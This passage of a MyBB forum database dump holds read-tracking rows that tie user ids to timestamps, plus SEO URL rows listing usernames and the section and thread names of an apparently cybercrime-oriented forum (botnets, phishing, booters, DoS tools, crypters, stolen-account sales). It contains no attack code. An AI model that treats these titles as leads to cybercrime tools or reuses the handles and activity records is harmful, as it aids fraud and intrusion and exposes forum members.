'1', '1352427117'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('17', '1', '1352492884'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('13', '67', '1352363435'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('56', '7', '1352536001'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('42', '53', '1352385714'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('20', '53', '1352659813'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('56', '82', '1352648045'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('18', '62', '1352397060'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('34', '2', '1352408253'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('18', '1', '1352526851'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('8', '1', '1352393480'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('11', '1', '1352772709'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('9', '62', '1352383940'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('61', '62', '1352798932'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('28', '53', '1352662536'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('47', '346', '1352809410'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('44', '257', '1352767975'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('65', '257', '1352767937'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('65', '1', '1352767507'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('44', '2', '1352765645'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('82', '2', '1352765414'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('30', '54', '1352443834'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('66', '61', '1352347128'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('61', '61', '1352347133'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('69', '9', '1352350143'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('13', '257', '1352353957'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('69', '67', '1352486400'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('81', '100', '1352375483'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('61', '100', '1352375618'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('13', '53', '1352387060'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('13', '1', '1352391879'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('13', '9', '1352391977'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('25', '5', '1352393641'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('25', '82', '1352550686'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('14', '331', '1352409541'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('11', '150', '1352411003'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('58', '332', '1352414719'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('72', '332', '1352414845'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('71', '332', '1352440747'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('4', '82', '1352662019'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('4', '1', '1352823640'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('25', '1', '1352427269'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('30', '1', '1352571057'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('49', '333', '1352441502'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('49', '1', '1352678725'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('42', '333', '1352625017'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('49', '334', '1352431858'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('54', '54', '1352437662'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('8', '332', '1352440850'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('69', '332', '1352443378'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('24', '332', '1352443405'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('18', '332', '1352443437'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('25', '67', '1352445821'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('49', '228', '1352470024'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('30', '228', '1352449726'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('49', '82', '1352519286'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('20', '336', '1352469285'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('58', '336', '1352469335'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('30', '53', '1352474302'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('69', '53', '1352475708'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('19', '61', '1352493760'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('29', '61', '1352491874'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('16', '1', '1352493094'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('23', '199', '1352501430'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('59', '338', '1352504168'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('46', '4', '1352519874'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('49', '4', '1352518667'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('16', '5', '1352521492'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('20', '5', '1352521610'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('61', '5', '1352521857'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('67', '5', '1352523437'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('28', '5', '1352524747'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('81', '1', '1352524893'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('28', '1', '1352771064'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('68', '9', '1352526452'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('28', '258', '1352526524'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('18', '9', '1352526830'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('25', '8', '1352527905'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('83', '1', '1352528081'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('83', '5', '1352528647'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('84', '1', '1352596640'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('31', '1', '1352596645'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('33', '1', '1352603898'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('33', '4', '1352597632'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('75', '5', '1352531538'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('23', '5', '1352531501'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('83', '53', '1352534397'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('58', '1', '1352536376'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('84', '53', '1352662553'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('49', '257', '1352619609'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('28', '257', '1352550689'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('28', '62', '1352550221'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('9', '228', '1352550807'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('28', '228', '1352580102'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('33', '82', '1352598257'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('28', '82', '1352550779'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('84', '228', '1352550736'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('9', '341', '1352555731'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('9', '257', '1352679635'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('33', '53', '1352561956'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('13', '4', '1352571989'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('16', '342', '1352663803'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('11', '53', '1352625357'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('48', '1', '1352580564'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('58', '61', '1352577390'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('50', '1', '1352578763'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('48', '228', '1352642360'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('82', '61', '1352583667'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('63', '4', '1352597601'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('63', '82', '1352762681'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('63', '1', '1352603955'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('25', '343', '1352609966'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('63', '257', '1352617562'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('65', '228', '1352642230'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('46', '53', '1352645334'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('63', '228', '1352648588'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('5', '61', '1352649954'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('8', '53', '1352660913'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('2', '1', '1352662546'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('64', '1', '1352662786'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('66', '1', '1352664724'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('74', '1', '1352761429'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('44', '82', '1352769141'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('34', '82', '1352762780'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('16', '325', '1352763240'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('47', '82', '1352771385'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('54', '1', '1352771071'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('13', '306', '1352771264'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('18', '306', '1352771619'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('23', '82', '1352771717'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('1', '1', '1352772304'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('11', '222', '1352772939'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('18', '4', '1352774384'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('69', '1', '1352785168'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('84', '54', '1352788585'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('29', '54', '1352819948'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('29', '62', '1352820831'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('69', '205', '1352809897'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('67', '205', '1352809968'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('24', '67', '1352811030'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('23', '67', '1352811022'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('28', '54', '1352814553'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('67', '67', '1352820211'); INSERT INTO `mybb_forumsread` (`fid`, `uid`, `dateline`) VALUES ('84', '67', '1352820670'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_forumsubscriptions`; CREATE TABLE `mybb_forumsubscriptions` ( `fsid` int(10) unsigned NOT NULL AUTO_INCREMENT, `fid` smallint(5) unsigned NOT NULL DEFAULT '0', `uid` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`fsid`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_forumsubscriptions` WRITE; UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_google_seo`; CREATE TABLE `mybb_google_seo` ( `active` tinyint(3) unsigned DEFAULT NULL, `idtype` tinyint(3) unsigned NOT NULL, `id` int(10) unsigned NOT NULL, `url` varchar(120) NOT NULL, UNIQUE KEY `idtype` (`idtype`,`url`), UNIQUE KEY `active` (`active`,`idtype`,`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_google_seo` WRITE; INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('', '0', '0', ''); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '60', 'guide-Basic-Computer-Security'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '16', 'Is-Hacking-legal-or-illegal'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '12', 'Tutorials'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('', '4', '358', 'Misconfigure-Unable-Cloudflare-downtime'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '362', 'List-of-TOP-10-HACKERS'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '63', 'Guide-Keylogger-Information-Removal-Guide'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '11', 'EXE-Booter-Pack'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '20', 'JakeUS'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '61', 'Unique-Headquarters'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '346', 'showthread.php?Heads-Up'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('', '3', '3', 'Announcements-Feedback-Bugs-and-Suggestions'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '358', 'showthread.php?Misconfigure-Unable-Cloudflare-downtime'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '1', 't3h-jok3r'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '61', 'NXK'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '166', '2112'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '181', 'Sotark'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '82', 'iTzIpod'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '150', 'MinecraftGeek'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '172', 'MistaCode'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '9', 'p420'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '53', 'sirchamp'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '180', 'ThatUselessMan'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '5', 'Timmy'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '112', '??????Z'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '1', 'General'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '2', 'Test'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '4', 'forumdisplay.php?Introduction'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '5', 'forumdisplay.php?Staff'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '6', 'Miscellaneous'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '7', 'forumdisplay.php?Off-Topic'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '8', 'forumdisplay.php?Music'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '9', 'forumdisplay.php?Monetizing-Techniques'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '10', 'Blackhat'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '11', 'forumdisplay.php?Help-Desk'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '13', 'forumdisplay.php?Website-and-Forum-Hacking'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '14', 'forumdisplay.php?Anonymity'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '15', 'forumdisplay.php?Tools-and-Programs'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '16', 'forumdisplay.php?Social-Engineering-and-Human-Manipulation'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '17', 'forumdisplay.php?E-Whoring'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '18', 'forumdisplay.php?AIM-MSN-IRC-ICQ-and-IM-Hacks'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '19', 'forumdisplay.php?Junk'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '20', 'forumdisplay.php?File-Protection-Crypters-Cryptography-etc'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '21', 'forumdisplay.php?Botnets-and-IRC-Bots-Zombies'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '22', 'Whitehat'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '23', 'forumdisplay.php?White-Hat-Help'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '24', 'forumdisplay.php?Miscellaneous-Computer-Talk'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '25', 'forumdisplay.php?Computer-Protection-and-Security-Breaches'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '26', 'LH-Elite'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '27', 'forumdisplay.php?Sign-up-for-Elite'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '28', 'Elite-Discussion-Area'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '29', 'Advanced-Methods'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '30', 'Premium-Downloads'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '31', 'Upgraded'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '32', 'GFX-Corner'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '33', 'forumdisplay.php?Graphics-Help-Desk'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '34', 'forumdisplay.php?Tutorials-and-Guides'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '35', 'forumdisplay.php?Graphics-Lounge'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '37', 'Marketplace-Discussions'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '38', 'forumdisplay.php?Scam-Reports'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '39', 'Premium-Sellers'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '40', 'Secondary-Sellers'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '41', 'Auctions'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '42', 'forumdisplay.php?News-and-Happening'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '43', 'forumdisplay.php?PIDs-Serials-CD-Keys-etc'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '44', 'forumdisplay.php?Receipts-and-POPs'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '45', 'forumdisplay.php?SEing-Graphical-help'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '46', 'forumdisplay.php?Phishing-and-Tabnabbing'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '47', 'forumdisplay.php?Member-Contests'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '48', 'forumdisplay.php?Mod'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '49', 'forumdisplay.php?Suggestions-and-Ideas'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '50', 'forumdisplay.php?Complaints-and-Rep-Abuse-Support'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '51', 'Coding'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '52', 'forumdisplay.php?Visual-Basic-and-Net-Framework'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '53', 'forumdisplay.php?Java'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '54', 'forumdisplay.php?Premium-Accounts'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '55', 'forumdisplay.php?Gay-Free-Requests'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '56', 'forumdisplay.php?Forum-Games'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '57', 'Groups'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '58', 'forumdisplay.php?Group-Recruitments-and-Discussions'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '59', 'forumdisplay.php?Ebooks'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '60', 'Private-Forums'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '62', 'forumdisplay.php?Account-Activation-Issues'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '205', 'showthread.php?First-Java-Multiplayer-Game'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '133', 'showthread.php?Online-Scanners-list'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '3', '3', 'forumdisplay.php?Announcements-Feedback-Bugs-and-Suggestions'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '7', 'Romdu62'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '13', 'unixmoon'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '17', 'khade009'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '62', 'R?????zo?'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '67', 'HoverCatz'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '84', 'Thunder™'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '90', 'duhuh'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '141', 'Bane™'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '154', 'fap'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '1', '171', 'W33D'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '106', 'showthread.php?Filling-a-scam-report'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '116', 'showthread.php?tut-Creating-a-Kindle-PID'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '121', 'showthread.php?kurosaki-s-DOS-Tool'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '164', 'showthread.php?Experiences-on-your-upgrade'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '180', 'showthread.php?Free-Saddam-s-Crypter-VB-Net-source-and-19-more-No-surveys'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '195', 'showthread.php?Selling-Cheap-Netflix-Accounts'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '212', 'showthread.php?Official-New-Groups-Questions-Inquires-Policies-and-More'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', '217', 'showthread.php?Fun-Find-the-SEX-of-your-Computer'); INSERT INTO `mybb_google_seo` (`active`, `idtype`, `id`, `url`) VALUES ('1', '4', 